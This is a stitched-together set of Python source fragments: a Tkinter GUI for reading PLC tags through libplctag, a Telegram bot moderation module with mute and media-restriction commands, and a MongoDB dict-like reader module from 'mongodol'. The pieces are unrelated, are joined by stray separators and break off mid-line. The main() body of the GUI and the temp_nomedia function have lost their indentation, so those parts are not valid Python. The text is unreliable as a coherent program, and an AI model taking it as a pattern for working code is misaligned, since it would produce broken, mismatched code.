        self.config(width=self.width, wraplength=self.width)
# entry box whose width follows the window on resize
class EntryResizing(Entry):
    """An Entry that tracks its container's width."""

    def __init__(self, parent, **kwargs):
        Entry.__init__(self, parent, **kwargs)
        # start from the requested width; updated on every <Configure> event
        self.width = self.winfo_reqwidth()
        self.bind("<Configure>", self.on_resize)

    def on_resize(self, event):
        """Adopt the new widget width."""
        if self.width <= 0:
            return
        self.width = int(event.width)
        self.config(width=self.width)
class connection_thread(threading.Thread):
    """Background thread that runs the PLC connection check off the GUI thread."""

    def __init__(self):
        super(connection_thread, self).__init__()

    def run(self):
        # delegate to the module-level connection routine
        comm_check()
class get_tags_thread(threading.Thread):
    """Background thread that fetches the tag list off the GUI thread."""

    def __init__(self):
        super(get_tags_thread, self).__init__()

    def run(self):
        # delegate to the module-level tag fetch routine
        getTags()
class update_thread(threading.Thread):
    """Background thread that starts the periodic tag value update loop."""

    def __init__(self):
        super(update_thread, self).__init__()

    def run(self):
        # delegate to the module-level update loop
        start_update_value()
# libplctag library version string; starts empty and is set elsewhere at runtime
plctagVersion = ''
def main():
'''
Create our window and comm driver
'''
global root
global tagID
global currentTag
global stringTag
global tagValue
global realElementCount
global selectedPath
global selectedIPAddress
global selectedPLC
global selectedDataType
global selectedPID
global selectedTCC
global selectedBit
global selectedStringLength
global selectedTag
global selectedBoolDisplay
global selectedProgramName
global updateRunning
global connectionInProgress
global connected
global bitIndex
global pidElement
global tccElement
global tccType
global plctagVersion
global offset
global lblTagStatus
global btnStart
global btnStop
global btnGetTags
global lbPLC
global lbDataType
global lbPID
global lbTCC
global lbBit
global lbStringLength
global lbBoolDisplay
global lbTags
global tbPLC
global tbDataType
global tbPID
global tbBit
global tbStringLength
global tbIPAddress
global tbPath
global tbTag
global tbProgramName
global popup_menu_tbIPAddress
global popup_menu_tbPath
global popup_menu_tbTag
global popup_menu_tbProgramName
root = Tk()
root.config(background='#837DFF')
root.title('Plctag GUI - Connection/Read Tester (Python v' + pythonVersion + ')')
root.geometry('800x600')
connected, connectionInProgress, updateRunning = False, False, True
currentTag, tccType, tccElement, pidElement, plctagVersion = myTag, '', 'None', 'None', ''
bitIndex, tagID, realElementCount = -1, -1, 0
#-------------------------------------------------------------------------------------------
# add a frame to hold top widgets
frame1 = Frame(root, background='#837DFF')
frame1.pack(fill=X)
# add listboxes for PLCs, DataTypes, PID, Timer/Counter/Control, Bits, Custom String Length, Bool Display and Tags
lbPLC = Listbox(frame1, height=11, width=12, bg='lightblue')
lbDataType = Listbox(frame1, height=11, width=13, bg='lightblue')
lbPID = Listbox(frame1, height=11, width=6, bg='lightblue')
lbTCC = Listbox(frame1, height=11, width=6, bg='lightblue')
lbBit = Listbox(frame1, height=11, width=6, bg='lightblue')
lbStringLength = Listbox(frame1, height=11, width=5, bg='lightblue')
lbBoolDisplay = Listbox(frame1, height=11, width=9, bg='lightblue')
lbTags = Listbox(frame1, height=11, width=50, bg='lightgreen')
lbPLC.insert(1, '~ PLC')
i = 2
for plc in ab_plc_type:
lbPLC.insert(i, plc)
i = i + 1
lbPLC.pack(anchor='n', side='left', padx=2, pady=3)
# select PLC on the mouse double-click
lbPLC.bind('<Double-Button-1>', lambda event: plc_select())
lbDataType.insert(1, '~ Data Type')
i = 2
for dataType in ab_data_type:
lbDataType.insert(i, dataType)
i = i + 1
lbDataType.pack(anchor='n', side='left', padx=2, pady=3)
# select Data Type on the mouse double-click
lbDataType.bind('<Double-Button-1>', lambda event: data_type_select())
# add scrollbar for the DataTypes list box
scrollbarDataTypes = Scrollbar(frame1, orient='vertical', width=12, command=lbDataType.yview)
scrollbarDataTypes.pack(anchor='n', side='left', pady=3, ipady=65)
lbDataType.config(yscrollcommand = scrollbarDataTypes.set)
# conditional addition of MicroLogix PID list box, for plctag library version lower than 2.2.0
if plc_tag_check_lib_version(2, 2, 0) != 0:
lbPID.insert(1, '~ PID')
i = 2
for pid in pid_bits_words:
lbPID.insert(i, pid)
i = i + 1
lbPID.pack(anchor='n', side='left', padx=3, pady=3)
if myTagDataType == 'pid':
lbPID['state'] = 'normal'
else:
lbPID['state'] = 'disabled'
# select PID on the mouse double-click
lbPID.bind('<Double-Button-1>', lambda event: pid_select())
# add scrollbar for the PID list box
scrollbarPID = Scrollbar(frame1, orient='vertical', width=12, command=lbPID.yview)
scrollbarPID.pack(anchor='n', side='left', pady=3, ipady=65)
lbPID.config(yscrollcommand = scrollbarPID.set)
lbTCC.insert(1, '~ TCC')
i = 2
for tccELMNT in timer_bits_words:
lbTCC.insert(i, tccELMNT)
i = i + 1
lbTCC.pack(anchor='n', side='left', padx=2, pady=3)
if myTagDataType == 'timer' or myTagDataType == 'counter' or myTagDataType == 'control':
lbTCC['state'] = 'normal'
else:
lbTCC['state'] = 'disabled'
# select TCC element on the mouse double-click
lbTCC.bind('<Double-Button-1>', lambda event: tcc_select())
# add scrollbar for the TCC list box
scrollbarTCC = Scrollbar(frame1, orient='vertical', width=12, command=lbTCC.yview)
scrollbarTCC.pack(anchor='n', side='left', pady=3, ipady=65)
lbTCC.config(yscrollcommand = scrollbarTCC.set)
lbBit.insert(1, '~ Bit')
i = 2
for bit in bits_8bit:
lbBit.insert(i, bit)
i = i + 1
lbBit.pack(anchor='n', side='left', padx=3, pady=3)
if regexp.match('.int.+', myTagDataType) or regexp.match('int.+', myTagDataType) or regexp.match('float.+', myTagDataType):
lbBit['state'] = 'normal'
else:
lbBit['state'] = 'disabled'
# select Bit on the mouse double-click
lbBit.bind('<Double-Button-1>', lambda event: bit_select())
# add scrollbar for the Bit list box
scrollbarBit = Scrollbar(frame1, orient='vertical', width=12, command=lbBit.yview)
scrollbarBit.pack(anchor='n', side='left', pady=3, ipady=65)
lbBit.config(yscrollcommand = scrollbarBit.set)
lbStringLength.insert(1, '~ Str')
i = 2
for strLength in string_length:
lbStringLength.insert(i, strLength)
i = i + 1
lbStringLength.pack(anchor='n', side='left', padx=3, pady=3)
if myTagDataType == 'custom string':
lbStringLength['state'] = 'normal'
else:
lbStringLength['state'] = 'disabled'
# select string length on the mouse double-click
lbStringLength.bind('<Double-Button-1>', lambda event: string_length_select())
# add scrollbar for the string length listbox
scrollbarStringLength = Scrollbar(frame1, orient='vertical', width=12, command=lbStringLength.yview)
scrollbarStringLength.pack(anchor='n', side='left', pady=3, ipady=65)
lbStringLength.config(yscrollcommand = scrollbarStringLength.set)
lbBoolDisplay.insert(1, '~ Bool')
i = 2
for boolDisplay in bool_display:
lbBoolDisplay.insert(i, boolDisplay)
i = i + 1
lbBoolDisplay.pack(anchor='n', side='left', padx=3, pady=3)
# select boolean display format on the mouse double-click
lbBoolDisplay.bind('<Double-Button-1>', lambda event: bool_display_select())
# add scrollbar for the Tags list box
scrollbarTags = Scrollbar(frame1, orient='vertical', width=12, command=lbTags.yview)
scrollbarTags.pack(anchor='n', side='right', padx=3, pady=3, ipady=65)
lbTags.config(yscrollcommand = scrollbarTags.set)
# copy selected tag to the clipboard on the mouse double-click
lbTags.bind('<Double-Button-1>', lambda event: tag_copy())
lbTags.pack(anchor='n', side='right', pady=3)
#-------------------------------------------------------------------------------------------
# add a frame to hold labels, Program Name entry box and Get Tags button
frame2 = Frame(root, background='#837DFF')
frame2.pack(fill=X)
# add text boxes to serve as labels showing currently selected PLC, DataType, PID, Bit, StringLength and BoolDisplay
selectedPLC = StringVar()
tbPLC = Entry(frame2, justify='center', textvariable=selectedPLC, width=12, fg='blue', state='readonly')
selectedPLC.set(currentPLC)
tbPLC.pack(side='left', padx=2, pady=1)
selectedDataType = StringVar()
tbDataType = Entry(frame2, justify='center', textvariable=selectedDataType, width=13, fg='blue', state='readonly')
if myTagDataType == '':
selectedDataType.set('int8')
else:
selectedDataType.set(myTagDataType)
tbDataType.pack(side='left', padx=2, pady=1)
# offsets used for positioning TCC, Bit, String Length and Bool Display list boxes (when PID list box is not included)
offsetTCCBox = 9
offsetBitBox = -7
offsetStringLengthBox = 5
offsetBoolBox = -4
# conditional addition of the | |
import html
from typing import Optional, List
from telegram import Message, Chat, Update, Bot, User
from telegram.error import BadRequest
from telegram.ext import CommandHandler, Filters
from telegram.ext.dispatcher import run_async
from telegram.utils.helpers import mention_html
from telegram import InlineKeyboardButton, InlineKeyboardMarkup, ParseMode, User, CallbackQuery
from haruka import dispatcher, LOGGER, SUDO_USERS
from haruka.modules.helper_funcs.chat_status import bot_admin, user_admin, is_user_admin, can_restrict
from haruka.modules.helper_funcs.extraction import extract_user, extract_user_and_text
from haruka.modules.helper_funcs.string_handling import extract_time
from haruka.modules.log_channel import loggable
from haruka.modules.translations.strings import tld
from haruka.modules.connection import connected
from haruka.modules.disable import DisableAbleCommandHandler
@run_async
@bot_admin
@user_admin
@loggable
def mute(bot: Bot, update: Update, args: List[str]) -> str:
    """Mute a user (revoke their right to send messages) in the current or connected chat.

    Returns an HTML log string for the log channel, or "" when nothing was done.
    """
    chat = update.effective_chat  # type: Optional[Chat]
    user = update.effective_user  # type: Optional[User]
    message = update.effective_message  # type: Optional[Message]

    # Resolve the chat to act on: the connected chat if one is set, else the current one.
    conn = connected(bot, update, chat, user.id)
    if conn is not False:
        chatD = dispatcher.bot.getChat(conn)
    elif chat.type == "private":
        # No connection and we're in a PM: nothing to mute here.
        # (Previously this called exit(1), which raises SystemExit inside the
        # dispatcher worker thread instead of simply ending the handler.)
        return ""
    else:
        chatD = chat

    user_id = extract_user(message, args)
    if not user_id:
        message.reply_text(tld(chat.id, "You'll need to either give me a username to mute, or reply to someone to be muted."))
        return ""

    if user_id == bot.id:
        message.reply_text(tld(chat.id, "I'm not muting myself!"))
        return ""

    member = chatD.get_member(int(user_id))
    if member:
        if user_id in SUDO_USERS:
            message.reply_text(tld(chat.id, "No! I'm not muting bot sudoers! That would be a pretty dumb idea."))
        elif is_user_admin(chatD, user_id, member=member):
            message.reply_text(tld(chat.id, "No! I'm not muting chat administrator! That would be a pretty dumb idea."))
        elif member.can_send_messages is None or member.can_send_messages:
            # can_send_messages is None for members with no explicit restriction.
            bot.restrict_chat_member(chatD.id, user_id, can_send_messages=False)
            keyboard = []
            reply = tld(chat.id, "{} is muted in {}!").format(mention_html(member.user.id, member.user.first_name), chatD.title)
            message.reply_text(reply, reply_markup=keyboard, parse_mode=ParseMode.HTML)
            return "<b>{}:</b>" \
                   "\n#MUTE" \
                   "\n<b>Admin:</b> {}" \
                   "\n<b>User:</b> {}".format(html.escape(chatD.title),
                                              mention_html(user.id, user.first_name),
                                              mention_html(member.user.id, member.user.first_name))
        else:
            message.reply_text(tld(chat.id, "This user is already muted in {}!").format(chatD.title))
    else:
        message.reply_text(tld(chat.id, "This user isn't in the {}!").format(chatD.title))
    return ""
@run_async
@bot_admin
@user_admin
@loggable
def unmute(bot: Bot, update: Update, args: List[str]) -> str:
    """Lift a mute: restore a user's full messaging rights in the current or connected chat.

    Returns an HTML log string for the log channel, or "" when nothing was done.
    """
    chat = update.effective_chat  # type: Optional[Chat]
    user = update.effective_user  # type: Optional[User]
    message = update.effective_message  # type: Optional[Message]

    # Resolve the chat to act on: the connected chat if one is set, else the current one.
    conn = connected(bot, update, chat, user.id)
    if conn is not False:
        chatD = dispatcher.bot.getChat(conn)
    elif chat.type == "private":
        # No connection and we're in a PM: nothing to unmute here
        # (was exit(1), which raises SystemExit in the worker thread).
        return ""
    else:
        chatD = chat

    user_id = extract_user(message, args)
    if not user_id:
        message.reply_text(tld(chat.id, "You'll need to either give me a username to unmute, or reply to someone to be unmuted."))
        return ""

    member = chatD.get_member(int(user_id))
    if member.status != 'kicked' and member.status != 'left':
        if member.can_send_messages and member.can_send_media_messages \
                and member.can_send_other_messages and member.can_add_web_page_previews:
            message.reply_text(tld(chat.id, "This user already has the right to speak in {}.").format(chatD.title))
        else:
            # Restore all send permissions at once.
            bot.restrict_chat_member(chatD.id, int(user_id),
                                     can_send_messages=True,
                                     can_send_media_messages=True,
                                     can_send_other_messages=True,
                                     can_add_web_page_previews=True)
            keyboard = []
            reply = tld(chat.id, "Yep, {} can start talking again in {}!").format(mention_html(member.user.id, member.user.first_name), chatD.title)
            message.reply_text(reply, reply_markup=keyboard, parse_mode=ParseMode.HTML)
            return "<b>{}:</b>" \
                   "\n#UNMUTE" \
                   "\n<b>• Admin:</b> {}" \
                   "\n<b>• User:</b> {}" \
                   "\n<b>• ID:</b> <code>{}</code>".format(html.escape(chatD.title),
                                                           mention_html(user.id, user.first_name),
                                                           mention_html(member.user.id, member.user.first_name), user_id)
    else:
        message.reply_text(tld(chat.id, "This user isn't even in the chat, unmuting them won't make them talk more than they "
                                        "already do!"))
    return ""
@run_async
@bot_admin
@can_restrict
@user_admin
@loggable
def temp_mute(bot: Bot, update: Update, args: List[str]) -> str:
    """Mute a user for a limited time in the current or connected chat.

    The first token after the user reference is the duration (parsed by
    extract_time); anything after it is kept as the reason.
    Returns an HTML log string for the log channel, or "" when nothing was done.
    """
    chat = update.effective_chat  # type: Optional[Chat]
    user = update.effective_user  # type: Optional[User]
    message = update.effective_message  # type: Optional[Message]

    # Resolve the chat to act on: the connected chat if one is set, else the current one.
    conn = connected(bot, update, chat, user.id)
    if conn is not False:
        chatD = dispatcher.bot.getChat(conn)
    elif chat.type == "private":
        # No connection and we're in a PM (was exit(1), which raises SystemExit
        # in the worker thread).
        return ""
    else:
        chatD = chat

    user_id, reason = extract_user_and_text(message, args)
    if not user_id:
        message.reply_text(tld(chat.id, "You don't seem to be referring to a user."))
        return ""

    try:
        # Look the member up in the *target* chat (chatD) so /connect'ed usage
        # works; the original queried the chat the command was issued in.
        member = chatD.get_member(user_id)
    except BadRequest as excp:
        if excp.message == "User not found":
            message.reply_text(tld(chat.id, "I can't seem to find this user"))
            return ""
        else:
            raise

    if is_user_admin(chatD, user_id, member):
        message.reply_text(tld(chat.id, "I really wish I could mute admins..."))
        return ""

    if user_id == bot.id:
        message.reply_text(tld(chat.id, "I'm not gonna MUTE myself, are you crazy?"))
        return ""

    if not reason:
        message.reply_text(tld(chat.id, "You haven't specified a time to mute this user for!"))
        return ""

    # First token is the duration; anything after it is the reason.
    split_reason = reason.split(None, 1)
    time_val = split_reason[0].lower()
    reason = split_reason[1] if len(split_reason) > 1 else ""

    mutetime = extract_time(message, time_val)
    if not mutetime:
        # extract_time already replied with the parse error.
        return ""

    log = "<b>{}:</b>" \
          "\n#TEMP MUTED" \
          "\n<b>Admin:</b> {}" \
          "\n<b>User:</b> {}" \
          "\n<b>Time:</b> {}".format(html.escape(chatD.title), mention_html(user.id, user.first_name),
                                     mention_html(member.user.id, member.user.first_name), time_val)
    if reason:
        log += "\n<b>Reason:</b> {}".format(reason)

    try:
        if member.can_send_messages is None or member.can_send_messages:
            # Restrict in the target chat (chatD), matching the reply text below.
            bot.restrict_chat_member(chatD.id, user_id, until_date=mutetime, can_send_messages=False)
            message.reply_text(tld(chat.id, "Muted for {} in {}!").format(time_val, chatD.title))
            return log
        else:
            message.reply_text(tld(chat.id, "This user is already muted in {}!").format(chatD.title))
    except BadRequest as excp:
        if excp.message == "Reply message not found":
            # The replied-to message vanished; send without quoting it.
            message.reply_text(tld(chat.id, "Muted for {} in {}!").format(time_val, chatD.title), quote=False)
            return log
        else:
            LOGGER.warning(update)
            LOGGER.exception("ERROR muting user %s in chat %s (%s) due to %s", user_id, chat.title, chat.id,
                             excp.message)
            message.reply_text(tld(chat.id, "Well damn, I can't mute that user."))
    return ""
@run_async
@bot_admin
@user_admin
@loggable
def nomedia(bot: Bot, update: Update, args: List[str]) -> str:
    """Restrict a user to text-only messages (no media) in the current or connected chat.

    Returns an HTML log string for the log channel, or "" when nothing was done.
    """
    chat = update.effective_chat  # type: Optional[Chat]
    user = update.effective_user  # type: Optional[User]
    message = update.effective_message  # type: Optional[Message]

    # Resolve the chat to act on: the connected chat if one is set, else the current one.
    conn = connected(bot, update, chat, user.id)
    if conn is not False:
        chatD = dispatcher.bot.getChat(conn)
    elif chat.type == "private":
        # No connection and we're in a PM (was exit(1), which raises SystemExit
        # in the worker thread).
        return ""
    else:
        chatD = chat

    user_id = extract_user(message, args)
    if not user_id:
        message.reply_text(tld(chat.id, "You'll need to either give me a username to restrict, or reply to someone to be restricted."))
        return ""

    if user_id == bot.id:
        message.reply_text(tld(chat.id, "I'm not restricting myself!"))
        return ""

    member = chatD.get_member(int(user_id))
    if member:
        if is_user_admin(chatD, user_id, member=member):
            message.reply_text(tld(chat.id, "Afraid I can't restrict admins!"))
        elif member.can_send_messages is None or member.can_send_messages:
            # Text stays allowed; only media / other message types are blocked.
            bot.restrict_chat_member(chatD.id, user_id, can_send_messages=True,
                                     can_send_media_messages=False,
                                     can_send_other_messages=False,
                                     can_add_web_page_previews=False)
            keyboard = []
            reply = tld(chat.id, "{} is restricted from sending media in {}!").format(mention_html(member.user.id, member.user.first_name), chatD.title)
            message.reply_text(reply, reply_markup=keyboard, parse_mode=ParseMode.HTML)
            return "<b>{}:</b>" \
                   "\n#RESTRICTED" \
                   "\n<b>• Admin:</b> {}" \
                   "\n<b>• User:</b> {}" \
                   "\n<b>• ID:</b> <code>{}</code>".format(html.escape(chatD.title),
                                                           mention_html(user.id, user.first_name),
                                                           mention_html(member.user.id, member.user.first_name), user_id)
        else:
            # Fix: the chat-title placeholder was previously left unformatted,
            # sending a literal "{}" to the user.
            message.reply_text(tld(chat.id, "This user is already restricted in {}!").format(chatD.title))
    else:
        message.reply_text(tld(chat.id, "This user isn't in the {}!").format(chatD.title))
    return ""
@run_async
@bot_admin
@user_admin
@loggable
def media(bot: Bot, update: Update, args: List[str]) -> str:
    """Lift a media restriction: restore full send rights in the current or connected chat.

    Returns an HTML log string for the log channel, or "" when nothing was done.
    """
    chat = update.effective_chat  # type: Optional[Chat]
    user = update.effective_user  # type: Optional[User]
    message = update.effective_message  # type: Optional[Message]

    # Resolve the chat to act on: the connected chat if one is set, else the current one.
    conn = connected(bot, update, chat, user.id)
    if conn is not False:
        chatD = dispatcher.bot.getChat(conn)
    elif chat.type == "private":
        # No connection and we're in a PM (was exit(1), which raises SystemExit
        # in the worker thread).
        return ""
    else:
        chatD = chat

    user_id = extract_user(message, args)
    if not user_id:
        message.reply_text(tld(chat.id, "You'll need to either give me a username to unrestrict, or reply to someone to be unrestricted."))
        return ""

    member = chatD.get_member(int(user_id))
    if member.status != 'kicked' and member.status != 'left':
        if member.can_send_messages and member.can_send_media_messages \
                and member.can_send_other_messages and member.can_add_web_page_previews:
            message.reply_text(tld(chat.id, "This user already has the rights to send anything in {}.").format(chatD.title))
        else:
            # Restore all send permissions at once.
            bot.restrict_chat_member(chatD.id, int(user_id),
                                     can_send_messages=True,
                                     can_send_media_messages=True,
                                     can_send_other_messages=True,
                                     can_add_web_page_previews=True)
            keyboard = []
            reply = tld(chat.id, "Yep, {} can send media again in {}!").format(mention_html(member.user.id, member.user.first_name), chatD.title)
            message.reply_text(reply, reply_markup=keyboard, parse_mode=ParseMode.HTML)
            return "<b>{}:</b>" \
                   "\n#UNRESTRICTED" \
                   "\n<b>• Admin:</b> {}" \
                   "\n<b>• User:</b> {}" \
                   "\n<b>• ID:</b> <code>{}</code>".format(html.escape(chatD.title),
                                                           mention_html(user.id, user.first_name),
                                                           mention_html(member.user.id, member.user.first_name), user_id)
    else:
        message.reply_text(tld(chat.id, "This user isn't even in the chat, unrestricting them won't make them send anything than they "
                                        "already do!"))
    return ""
@run_async
@bot_admin
@can_restrict
@user_admin
@loggable
def temp_nomedia(bot: Bot, update: Update, args: List[str]) -> str:
chat = update.effective_chat # type: Optional[Chat]
user = update.effective_user # type: Optional[User]
message = update.effective_message # type: Optional[Message]
conn = connected(bot, update, chat, user.id)
if not conn == False:
chatD = dispatcher.bot.getChat(conn)
else:
if chat.type == "private":
exit(1)
else:
chatD = chat
user_id, reason = extract_user_and_text(message, args)
if not user_id:
message.reply_text(tld(chat.id, "You don't seem to be referring to a user."))
return ""
try:
member = chat.get_member(user_id)
except BadRequest as excp:
if excp.message == "User not found":
message.reply_text(tld(chat.id, "I can't seem to find this user"))
return ""
else:
raise
if is_user_admin(chat, user_id, member):
message.reply_text(tld(chat.id, "I really wish I could restrict admins..."))
return ""
if user_id == bot.id:
message.reply_text(tld(chat.id, "I'm not gonna RESTRICT myself, are you crazy?"))
return ""
if not reason:
message.reply_text(tld(chat.id, "You haven't specified a time to restrict this user for!"))
return ""
split_reason = reason.split(None, 1)
time_val = split_reason[0].lower()
if len(split_reason) > 1:
reason = split_reason[1]
else:
reason = ""
mutetime = extract_time(message, time_val)
if not mutetime:
return ""
log = "<b>{}:</b>" \
"\n#TEMP RESTRICTED" \
"\n<b>• Admin:</b> {}" \
"\n<b>• User:</b> {}" \
"\n<b>• ID:</b> <code>{}</code>" \
"\n<b>• Time:</b> {}".format(html.escape(chat.title), mention_html(user.id, user.first_name),
mention_html(member.user.id, member.user.first_name), user_id, time_val)
if reason:
log += "\n<b>• Reason:</b> {}".format(reason)
try:
if member.can_send_messages is None or member.can_send_messages:
bot.restrict_chat_member(chat.id, user_id, until_date=mutetime, can_send_messages=True,
can_send_media_messages=False,
can_send_other_messages=False,
can_add_web_page_previews=False)
message.reply_text(tld(chat.id, "Restricted from sending media for {} | |
from functools import wraps, cached_property
from typing import Optional, Union, Iterable
from collections import ChainMap

# Mapping and the mapping-view ABCs must come from collections.abc:
# importing them from `collections` directly was removed in Python 3.10.
# (The module previously also imported typing.Mapping, immediately shadowed
# by the collections one, and imported dol.KvReader twice.)
from collections.abc import Mapping, KeysView, ValuesView, ItemsView
from collections.abc import (
    KeysView as BaseKeysView,
    ValuesView as BaseValuesView,
    ItemsView as BaseItemsView,
)

from pymongo import MongoClient

from dol import KvReader
from dol import Collection as DolCollection

from mongodol.constants import ID, PyMongoCollectionSpec, end_of_cursor, DFLT_TEST_DB
from mongodol.util import (
    ProjectionSpec,
    normalize_projection,
    projection_union,
    get_mongo_collection_pymongo_obj,
)
class BaseMapping:
    """Mapping mix-in whose ``keys``/``values``/``items`` views are pluggable.

    Subclasses swap in their own view classes by overriding the ``KeysView``,
    ``ValuesView`` and ``ItemsView`` class attributes; each accessor builds its
    view through the (possibly overridden) factory, passing ``self`` to it.
    """

    # View factories; subclasses may replace any of these.
    KeysView = BaseKeysView
    ValuesView = BaseValuesView
    ItemsView = BaseItemsView

    def keys(self):
        """Return a keys view built with this class's ``KeysView`` factory."""
        view_factory = self.KeysView
        return view_factory(self)

    def values(self):
        """Return a values view built with this class's ``ValuesView`` factory."""
        view_factory = self.ValuesView
        return view_factory(self)

    def items(self):
        """Return an items view built with this class's ``ItemsView`` factory."""
        view_factory = self.ItemsView
        return view_factory(self)
class SpecialKeysView(BaseMapping.KeysView):  # or SpecialKeysView(BaseKeysView)
    """Example of a custom keys view: extends the base view with an extra method."""

    def extra_method(self):
        """Placeholder demonstrating where view-specific behavior would go."""
class SpecialMapping(BaseMapping):
    """Example mapping that plugs ``SpecialKeysView`` in as its keys-view factory."""
    KeysView = SpecialKeysView
# TODO: mgc type annotation
# See https://stackoverflow.com/questions/66464191/referencing-a-python-class-within-its-definition-but-outside-a-method
class MongoCollectionCollection(DolCollection):
    """A ``dol`` Collection view over (a filtered subset of) a pymongo collection.

    Iterating yields the documents matching ``filter`` projected through
    ``iter_projection``; ``len`` and membership tests are answered by mongo
    itself (``count_documents`` / a one-document ``find``).
    """

    def __init__(
        self,
        mgc: Union[PyMongoCollectionSpec, DolCollection] = None,
        filter: Optional[dict] = None,
        iter_projection: Optional[dict] = None,
        **mgc_find_kwargs,
    ):
        """
        :param mgc: pymongo collection (or a spec resolvable to one)
        :param filter: mongo query dict restricting the visible subset
        :param iter_projection: projection applied when iterating
        :param mgc_find_kwargs: extra keyword args forwarded to ``mgc.find``
        """
        self.mgc = get_mongo_collection_pymongo_obj(mgc)
        self.filter = filter or {}
        self._iter_projection = iter_projection
        self._mgc_find_kwargs = mgc_find_kwargs

    def _merge_with_filt(self, m: Mapping) -> dict:
        """
        :param args: dictionaries that are valid mongo queries
        :return:
        >>> class Mock(MongoCollectionCollection):
        ...     def __init__(self, filter):
        ...         self.filter = filter
        >>> s = Mock(filter={'a': 3, 'b': {'$in': [1, 2, 3]}})
        >>> s._merge_with_filt({'c': 'me'})
        {'$and': [{'a': 3, 'b': {'$in': [1, 2, 3]}}, {'c': 'me'}]}
        >>> s._merge_with_filt({'b': 4})
        {'$and': [{'a': 3, 'b': {'$in': [1, 2, 3]}}, {'b': 4}]}
        """
        # return {"$and": [self.filter, *args]} # in case we want to move to handling several elements to merge
        return {'$and': [self.filter, m]}

    def __iter__(self):
        return self.mgc.find(
            filter=self.filter,
            projection=self._iter_projection,
            **self._mgc_find_kwargs,
        )

    def __len__(self):
        # count_documents only accepts a subset of find's kwargs; see _count_kwargs.
        return self.mgc.count_documents(**self._count_kwargs)

    def __contains__(self, k: dict):
        # Empty projection: we only care whether at least one document matches.
        cursor = self.mgc.find(self._merge_with_filt(k), projection=())
        return next(cursor, end_of_cursor) is not end_of_cursor

    @cached_property
    def _count_kwargs(self):
        """The subset of find kwargs that count_documents also understands."""
        search_map = ChainMap(self._mgc_find_kwargs, dict(filter=self.filter))
        return {
            x: search_map[x]
            for x in ['filter', 'skip', 'limit', 'hint']
            if x in search_map
        }

    @cached_property
    def mgc_repr(self):
        return f'<{self.mgc.database.name}/{self.mgc.name}>'

    def __repr__(self):
        # Join the extra find kwargs with an explicit ", " prefix each, so the
        # repr stays well-formed whether or not any were given. (The previous
        # version glued them directly onto the iter_projection value, yielding
        # e.g. "iter_projection=Nonelimit=2)".)
        extras = ''.join(f', {k}={v}' for k, v in self._mgc_find_kwargs.items())
        return (
            f'{type(self).__name__}(mgc={self.mgc_repr}, filter={self.filter}, '
            f'iter_projection={self._iter_projection}{extras})'
        )
class MongoValuesView(ValuesView):
    """Values view over a mongo-backed mapping: yields and searches raw documents."""

    def __contains__(self, v):
        # Ask mongo whether at least one document matches both the mapping's
        # filter and v; the empty projection keeps the answer cheap.
        mapping = self._mapping
        cursor = mapping.mgc.find(filter=mapping._merge_with_filt(v), projection=())
        return next(cursor, end_of_cursor) is not end_of_cursor

    def __iter__(self):
        mapping = self._mapping
        return mapping.mgc.find(filter=mapping.filter, projection=mapping._getitem_projection)

    # def distinct(self, key, filter=None, **kwargs):
    #     m = self._mapping
    #     # TODO: Check if this is correct (what about $ cases?): filter=m._merge_with_filt(filter)
    #     return m.mgc.distinct(key, filter=m._merge_with_filt(filter), **kwargs)
    #
    # unique = distinct
class MongoItemsView(ItemsView):
    """Items view over a mongo-backed mapping: yields ``(key_projection, rest_of_doc)`` pairs."""

    def __contains__(self, item):
        key, val = item
        mapping = self._mapping
        # TODO: How do we have cursor return no data (here still has _id)
        query = dict(val, **mapping._merge_with_filt(key))
        cursor = mapping.mgc.find(filter=query, projection=())
        # return cursor
        return next(cursor, end_of_cursor) is not end_of_cursor

    def __iter__(self):
        mapping = self._mapping
        for doc in mapping.mgc.find(filter=mapping.filter, projection=mapping._items_projection):
            # Split each document: the key fields become the key dict, the rest is the value.
            key = {field: doc.pop(field) for field in mapping.key_fields}
            yield key, doc
class MongoCollectionReader(MongoCollectionCollection, KvReader):
    """A base class to read from a mongo collection, or subset thereof, with the Mapping (i.e. dict-like) interface.
    Some examples below. For examples using actual data (with setup and tear down) see the tests/ folder.
    >>> from pymongo import MongoClient
    >>> s = MongoCollectionReader(MongoClient()['mongodol']['mongodol_test'])
    >>> list_of_keys = list(s)
    >>> fake_key = {'_id': 'this key does not exist'}
    >>> fake_key in s
    False
    It's important to note that ``s[k]`` (for any base MongoCollectionReader instance ``s``) returns a Cursor,
    and will always return a Cursor, no matter what key ``k`` you ask for
    -- as long as the key is a valid mapping (dict usually).
    This cursor is a (pymongo) object that is used to iterate over the results of the ``k`` lookup.
    It may yield no results what-so-ever, or one, or many.
    >>> v = s[fake_key]
    >>> type(v).__name__
    'Cursor'
    >>> len(list(v))  # but the cursor yields no results
    0
    Indeed, ``MongoCollectionReader`` is really meant to provide a low level key-value interface to a mongo collection
    that is really meant to be wrapped in order to produce the actual key-value interfaces one needs.
    You shouldn't think of it's instances as a normal dict where any request for the value under a key,
    for a key that doesn't exist, will result in a ``KeyError``.
    Note that this means that `s.get(k, default)` will never result in the default being returned,
    since there are no missing keys here; only empty results (cursors that don't yield anything).
    >>> v = s.get(fake_key, {'the': 'default'})
    >>> assert v != {'the': 'default'}
    ``s.keys()``, ``s.values()``, and ``s.items()`` are ``collections.abc.MappingViews`` instances
    (specialized for mongo).
    >>> type(s.keys()).__name__
    'KeysView'
    >>> type(s.values()).__name__
    'MongoValuesView'
    >>> type(s.items()).__name__
    'MongoItemsView'
    Recall that ``collections.abc.MappingViews`` have many set-like functionalities:
    >>> fake_key in s.keys()
    False
    >>> a_list_of_fake_keys = [{'_id': 'fake_key'}, {'_id': 'yet_another'}]
    >>> s.keys().isdisjoint(a_list_of_fake_keys)
    True
    >>> s.keys() & a_list_of_fake_keys
    set()
    >>> fake_value = {'data': "this does not exist"}
    >>> fake_value in s.values()
    False
    >>> fake_item = (fake_key, fake_value)
    >>> fake_item in s.items()
    False
    Note though that since keys and values are both dictionaries in mongo, some of these set-like functionalities
    might not work (complaints such as ``TypeError: unhashable type: 'dict'``),
    such as:
    >>> s.keys() | a_list_of_fake_keys
    Traceback (most recent call last):
    ...
    TypeError: unhashable type: 'dict'
    But you can take care of that in higher level wrappers that have hashable keys and/or values.
    """

    # Whether the iter/getitem projections are already "flattened" field specs
    # (passed through to projection_union in _items_projection).
    _projections_are_flattened = False

    # View classes used for values() and items(); keys() uses the plain KeysView.
    _wrap_for_method = {
        'values': MongoValuesView,
        'items': MongoItemsView,
    }

    def __init__(
        self,
        mgc: Union[PyMongoCollectionSpec, KvReader] = None,
        filter: Optional[dict] = None,
